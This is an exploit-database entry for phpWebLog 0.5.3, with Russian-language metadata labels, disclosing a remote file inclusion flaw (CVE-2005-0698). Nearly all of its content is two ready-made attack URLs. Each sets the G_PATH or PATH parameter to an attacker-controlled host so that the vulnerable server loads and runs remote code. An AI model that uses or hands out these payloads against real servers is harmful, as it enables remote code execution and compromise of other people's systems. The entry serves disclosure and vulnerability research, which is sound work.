Exploit phpWebLog 0.5.3 - Arbitrary File Inclusion

[Exploiter]

EDB-ID

864

Проверка EDB

1. Пройдено

Автор

FILIP GROSZYNSKI

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2005-0698

Дата публикации

2005-03-07

Example:

 if register_globals=on and allow_url_fopen=on:
   http://[victim]/[dir]/include/init.inc.php?G_PATH=http://[hacker_box]/
   http://[victim]/[dir]/backend/addons/links/index.php?PATH=http://[hacker_box]/

# milw0rm.com [2005-03-07]